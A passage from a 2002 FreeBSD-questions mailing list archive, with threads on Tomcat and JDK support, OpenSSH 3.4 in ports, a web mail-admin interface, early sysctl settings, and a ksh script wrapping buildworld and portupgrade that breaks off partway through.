deal either because the machine is > going to be > locked down from the outside. Since the user will be admin'ing it > themselves, I need to make maintaining this as easy as possible for > them. Any suggestions or ports would be welcome. Thanks. > > - The Raiden Knows > > "Remember amateurs built the ark -- professionals built the > Titanic." - > Unknown > > "Just when you think you have life figured out and all is > going well, watch > your step, for you are about to fall." - Ancient Proverb > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 11:38:35 2002 Delivered-To: freebsd-questions@freebsd.org Received: from bunning.skiltech.com (bunning.skiltech.com [216.235.79.240]) by hub.freebsd.org (Postfix) with ESMTP id 70EBD37B72B for ; Wed, 26 Jun 2002 11:27:53 -0700 (PDT) Received: (from root@localhost) by bunning.skiltech.com (8.11.6/8.11.6) id g5QIRqS32680; Wed, 26 Jun 2002 14:27:52 -0400 (EDT) (envelope-from minter) Received: (from minter@localhost) by bunning.skiltech.com (8.11.6/8.11.6) id g5QIRoG32671; Wed, 26 Jun 2002 14:27:50 -0400 (EDT) (envelope-from minter) Date: Wed, 26 Jun 2002 14:27:50 -0400 (EDT) From: "H. Wade Minter" X-X-Sender: minter@bunning.skiltech.com To: guilherme komel Cc: freebsd-questions@freebsd.org Subject: Re: Tomcat + Apache + JDK In-Reply-To: <5.1.0.14.0.20020626150906.00acc118@mail.supero.com.br> Message-ID: <20020626142639.J32455-100000@bunning.skiltech.com> X-Folkin-Excellent: Eddie From Ohio (efohio.com) MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Wed, 26 Jun 2002, guilherme komel wrote: > many thanx for taking the time. I am installing a Tomcat 4 + Apache 1.3 + JDK . > > I have not being able to find accurate updated information on > freebsd.org/java page and I wonder what version of the JDK I am able to run > natively (not using Linux compat) on the FreeBSD 4.6 ... . I had a developer request Tomcat 4 and JDK 1.4 for a project he was working on, and from the research I did, it's not possible to get that combination running yet on FreeBSD. If anyone finds out any different, I'd be glad to hear about it. We're having to move that particular part of the website to a Linux box. :-/ --Wade -- 'I say to you that the VCR is to the American film producer and the American public as the Boston strangler is to the woman home alone.' Jack Valenti on VCRs, 1982 'It's getting clear -- alarmingly clear, I might add -- that we are in the midst of the possibility of Armageddon.' Jack Valenti on the Internet, 2002 http://www.digitalconsumer.org/ http://digitalspeech.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 11:41: 7 2002 Delivered-To: freebsd-questions@freebsd.org Received: from intergate.sdccd.cc.ca.us (intergate.sdccd.cc.ca.us [209.129.16.2]) by hub.freebsd.org (Postfix) with ESMTP id DEF0937B734 for ; Wed, 26 Jun 2002 11:27:57 -0700 (PDT) Received: from ntxdistrict.sdccd.cc.ca.us (ntxdistrict.sdccd.cc.ca.us [10.1.100.1]) by intergate.sdccd.cc.ca.us (8.9.1a/8.9.1) with ESMTP id LAA21282; Wed, 26 Jun 2002 11:27:33 -0700 (PDT) Received: by ntxdistrict.sdccd.cc.ca.us with Internet Mail Service (5.5.2654.89) id ; Wed, 26 Jun 2002 11:26:32 -0700 Message-ID: From: Erin Fortenberry To: Lord Raiden , FreeBDS-Questions Subject: RE: OpenSSH 3.4 available?? Date: Wed, 26 Jun 2002 11:26:29 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2654.89) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG It was updated at about 10:30. http://www.freshports.org/security/openssh/ Erin > -----Original Message----- > From: Brendan McAlpine [mailto:bmcalpine@macconnect.com] > Sent: Wednesday, June 26, 2002 11:22 AM > To: Lord Raiden; FreeBDS-Questions > Subject: Re: OpenSSH 3.4 available?? > > > I downloaded the new set of ports today after reading those > announcements. > However, the openssh version in the ports is still 3.3. > > Brendan > > > From: Lord Raiden > > Date: Wed, 26 Jun 2002 14:22:19 -0400 > > To: FreeBDS-Questions > > Subject: OpenSSH 3.4 available?? > > > > Is OpenSSH 3.4 available now in the ports? Cause the > announcement about > > it just went out on Slashdot and Bugtraq a day early. So I > need to hurry > > up and get on the ball with finishing my upgrade. Thanks all. > > > > - The Raiden Knows > > > > "Remember amateurs built the ark -- professionals built > the Titanic." - > > Unknown > > > > "Just when you think you have life figured out and all is > going well, watch > > your step, for you are about to fall." - Ancient Proverb > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-questions" in the body of the message > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 11:42: 0 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mailer.cia-g.com (mailer.cia-g.com [65.100.115.10]) by hub.freebsd.org (Postfix) with ESMTP id 3270437B790 for ; Wed, 26 Jun 2002 11:28:50 -0700 (PDT) Received: from cygnus.cia-g.com (data.cia-g.com [65.100.119.165]) by mailer.cia-g.com (Postfix) with ESMTP id A020E36F9; Wed, 26 Jun 2002 12:45:51 -0600 (MDT) Received: from raz by cygnus.cia-g.com with local (Exim 3.12 #1 (Debian)) id 17NHX7-0003G7-00; Wed, 26 Jun 2002 12:28:49 -0600 Date: Wed, 26 Jun 2002 12:28:49 -0600 From: David Wilk To: Lord Raiden Cc: freebsd-questions@FreeBSD.ORG Subject: Re: Web admin interface for the less skilled Message-ID: <20020626122849.F10404@cygnus.wks.Gallup.cia-g.com> Mail-Followup-To: David Wilk , Lord Raiden , freebsd-questions@FreeBSD.ORG References: <4.2.0.58.20020626142220.009bec10@pop.netzero.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <4.2.0.58.20020626142220.009bec10@pop.netzero.net>; from raiden23@netzero.net on Wed, Jun 26, 2002 at 02:28:11PM -0400 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hmmm.. secure mail server from the outside with a web interface for user management? I'm thinking qmail w/ sqwebmail to manage the virtualpop mailboxes. Here's where you can take a look at it: http://www.inter7.com/sqwebmail/ and, it's in ports. On Wed, Jun 26, 2002 at 02:28:11PM -0400 or thereabouts, Lord Raiden wrote: > HI all. Looking for a good web interface that is either a drop in place, > or limited config administration package that will allow someone not > familiar with FreeBSD to be able to admin a mail server. I don't need > anything special. All this person needs to do is add a user or delete a > user, and the users added should have minimal privaledges, because it's > only going to be used as a mail server, nothing else. > > It's also going to be hidden behind a firewall at a client's location so > security is not that big a deal either because the machine is going to be > locked down from the outside. Since the user will be admin'ing it > themselves, I need to make maintaining this as easy as possible for > them. Any suggestions or ports would be welcome. Thanks. > > - The Raiden Knows > > "Remember amateurs built the ark -- professionals built the Titanic." - > Unknown > > "Just when you think you have life figured out and all is going well, watch > your step, for you are about to fall." - Ancient Proverb > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message -- ******************************* David Wilk System Administrator Community Internet Access, Inc. admin@cia-g.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 11:43:12 2002 Delivered-To: freebsd-questions@freebsd.org Received: from utility.clubscholarship.com (utility.clubscholarship.com [198.78.70.175]) by hub.freebsd.org (Postfix) with ESMTP id 6B6A337B7D7 for ; Wed, 26 Jun 2002 11:30:44 -0700 (PDT) Received: from localhost (root@localhost) by utility.clubscholarship.com (8.11.6/8.11.6) with ESMTP id g5QIR2B63741 for ; Wed, 26 Jun 2002 11:27:07 -0700 (PDT) (envelope-from root@utility.clubscholarship.com) Date: Wed, 26 Jun 2002 11:27:02 -0700 (PDT) From: Patrick Thomas To: Subject: earliest possible sysctl setting ? Message-ID: <20020626112439.R68572-100000@utility.clubscholarship.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello, I would like to set a certain sysctl (shm_use_phys) as early as possible during boot - before any other sysctls are set and before the daemons get started. I tried just putting the `sysctl -w` line as the first command in /etc/rc, but it didn't get set when I rebooted? Why is that, when /etc/rc obviously runs at boot - why wouldn't it set the sysctl. Anyway, I just need to set that sysctl as early as possible during startup, so any suggestions along that line are appreciated. --PT To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 11:45:43 2002 Delivered-To: freebsd-questions@freebsd.org Received: from chivas.oneill.dhs.org (chivas.oneill.dhs.org [65.65.85.161]) by hub.freebsd.org (Postfix) with ESMTP id 58F6E37B80C for ; Wed, 26 Jun 2002 11:31:42 -0700 (PDT) Received: from v812r.seanoneill.info (dhcp1.NONROUTABLE [192.168.2.1]) by chivas.oneill.dhs.org (Postfix) with ESMTP id 5429C767D; Wed, 26 Jun 2002 13:31:37 -0500 (CDT) Message-Id: <5.1.0.14.0.20020626132323.00aee270@postoffice.swbell.net> X-Sender: swoneill@postoffice.swbell.net X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Wed, 26 Jun 2002 13:31:36 -0500 To: David Wilk , Darren Pilgrim From: Sean O'Neill Subject: Re: Updating my ports tree? Cc: FreeBSD-Questions In-Reply-To: <20020626121013.C10404@cygnus.wks.Gallup.cia-g.com> References: <3D19267F.8A2FCFE5@pantherdragon.org> <3D19267F.8A2FCFE5@pantherdragon.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Be careful using portupgrade for EVERYTHING. Upgrading things can at times mess up your old configuration settings. If you update everything at once, it tough to figure out what's not working immediately assuming you have lots of stuff installed - like me. This is a script I wrote that somewhat helps me manage my machine and the ports installation. I usually use the "port-upgrade" option and walk through the ports I think are important first. Once I have everything important individually upgraded and verified as working. I actually rarely using the allport-upgrade switch with this script anymore. #!/usr/local/bin/ksh KERNEL="COMPAQ-tuned" CVSUPFILE="/usr/cvs-supfile" case "$1" in 'buildworld') cd /usr/src make clean make buildworld ;; 'installworld') cd /usr/src make installworld ;; 'buildkernel') if [ ! -z "${2}" ]; then KERNEL=${2} fi cd /usr/src make buildkernel KERNCONF=${KERNEL} ;; 'installkernel') if [ ! -z "${2}" ]; then KERNEL=${2} fi cd /usr/src make installkernel KERNCONF=${KERNEL} ;; 'update') cd /usr/src echo "Updating source in /usr/src ..." make update ;; # rebuild-pkdb was added specifically for the following which indicates the # pkgdb.db file is corrupt: # /usr/local/lib/ruby/site_ruby/1.6/pkgdb.rb:243:in `each_key': tried to allocate too big memory (NoMemoryError) 'rebuild-pkgdb') pkgdb -fu ;; 'ports-workclean') for portdir in $(find . -type d -name work -print) do cd ${portdir} cd .. make clean done ;; 'portdb-clean') /usr/local/sbin/pkgdb -F ;; 'allport-upgrade') echo "NOTE: Did you run allport-chk first and you are sure you want to do this?" sleep 5 echo "Updating ports using portupgrade ..." /usr/local/sbin/portupgrade -ra ;; 'port-upgrade') if [ ! -z "${2}" ]; then PORT=${2} else echo "ERROR: You must specify a port to upgrade you dork !!!" exit 1 fi echo "NOTE: Did you run allport-chk first and you are sure you want to do this?" sleep 5 echo "Updating ${PORT} using portupgrade ..." /usr/local/sbin/portupgrade -r ${PORT} ;; 'allport-chk') echo "NOTE: This assumes the ports tree has been updated recently." echo "Checking ports needing to be upgraded ..." pkg_version -L = ;; *) echo "Usage: ${0}